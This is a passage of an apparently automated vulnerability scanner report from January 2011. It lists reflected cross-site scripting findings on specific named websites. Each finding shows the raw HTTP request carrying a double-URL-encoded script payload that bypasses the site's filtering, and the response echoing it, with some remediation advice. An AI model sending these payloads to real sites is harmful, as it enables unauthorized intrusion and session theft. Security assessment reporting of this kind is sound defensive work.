The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9512%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee1fd9be6da3 was submitted in the REST URL parameter 3. This input was echoed as d9512"><img src=a onerror=alert(1)>e1fd9be6da3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/joomla/1-joomla-16-je-tud9512%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee1fd9be6da3 HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=4e6292121ddffab5507f5e58e905f7fb; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tud9512"><img src=a onerror=alert(1)>e1fd9be6da3" />
...[SNIP]...

4.409. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57476%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3231f45f59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57476\"><script>alert(1)</script>3231f45f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3231f45f59c=1 HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=99325c8ec62692dc740442bdffc82c84; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<form method="post" action="http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476\"><script>alert(1)</script>3231f45f59c=1&hitcount=0">
...[SNIP]...

4.410. http://www.abbreviations.com/abbr.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 was submitted in the REST URL parameter 1. This input was echoed as 66679"><script>alert(1)</script>9a4f7ab6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.css66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:24 GMT
Content-Length: 27103

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.css66679"><script>alert(1)</script>9a4f7ab6f7 stand for?, What does abbr.css66679">
...[SNIP]...

4.411. http://www.abbreviations.com/abbr.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 was submitted in the REST URL parameter 1. This input was echoed as 93dfb<script>alert(1)</script>a69817cc1a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.css93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:53 GMT
Content-Length: 27061

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>a69817cc1a7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>alert(1)</script>a69817cc1a7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>
...[SNIP]...

4.412. http://www.abbreviations.com/abbr.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74516%2522%253balert%25281%2529%252f%252f44905aad793 was submitted in the REST URL parameter 1. This input was echoed as 74516";alert(1)//44905aad793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css74516%2522%253balert%25281%2529%252f%252f44905aad793 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:38 GMT
Content-Length: 26744

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.css74516";alert(1)//44905aad793";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css74516";alert(1)//44905aad793" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href
...[SNIP]...

4.413. http://www.abbreviations.com/abbr.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 was submitted in the REST URL parameter 1. This input was echoed as 73595</title><script>alert(1)</script>9905ecb5304 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.css73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:18 GMT
Content-Length: 27311

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.css73595</title><script>alert(1)</script>9905ecb5304 stand for?</title>
...[SNIP]...

4.414. http://www.abbreviations.com/abbr.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de was submitted in the REST URL parameter 1. This input was echoed as e5e15";alert(1)//7bcb080d8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.jse5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:54 GMT
Content-Length: 26717

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.415. http://www.abbreviations.com/abbr.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 was submitted in the REST URL parameter 1. This input was echoed as c284a"><script>alert(1)</script>7d67615d230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.jsc284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:32 GMT
Content-Length: 27122

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.jsc284a"><script>alert(1)</script>7d67615d230 stand for?, What does abbr.jsc284a">
...[SNIP]...

4.416. http://www.abbreviations.com/abbr.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 was submitted in the REST URL parameter 1. This input was echoed as 66a46</title><script>alert(1)</script>cc47256e3b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.js66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:27:12 GMT
Content-Length: 27284

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.js66a46</title><script>alert(1)</script>cc47256e3b6 stand for?</title>
...[SNIP]...

4.417. http://www.abbreviations.com/abbr.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 was submitted in the REST URL parameter 1. This input was echoed as 99dbd<script>alert(1)</script>23471ee6b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbr.js99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:26:27 GMT
Content-Length: 27049

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>23471ee6b28";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>alert(1)</script>23471ee6b28" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>
...[SNIP]...

4.418. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14548%2522%253balert%25281%2529%252f%252fa75b5821976 was submitted in the REST URL parameter 1. This input was echoed as 14548";alert(1)//a75b5821976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbreviations14548%2522%253balert%25281%2529%252f%252fa75b5821976/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:34:01 GMT
Connection: close
Content-Length: 26845

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.
...[SNIP]...

4.419. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084 was submitted in the REST URL parameter 1. This input was echoed as 5e49c</title><script>alert(1)</script>97f972b3084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbreviations5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:37:12 GMT
Connection: close
Content-Length: 27412

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbreviations5e49c</title><script>alert(1)</script>97f972b3084 stand for?</title>
...[SNIP]...

4.420. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb was submitted in the REST URL parameter 1. This input was echoed as baf28"><script>alert(1)</script>73b2621bbdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /abbreviationsbaf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:57 GMT
Connection: close
Content-Length: 27284

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbreviationsbaf28"><script>alert(1)</script>73b2621bbdb stand for?, What does abbreviationsbaf28">
...[SNIP]...

4.421. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f was submitted in the REST URL parameter 1. This input was echoed as 3533a<script>alert(1)</script>02ec5d2c02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

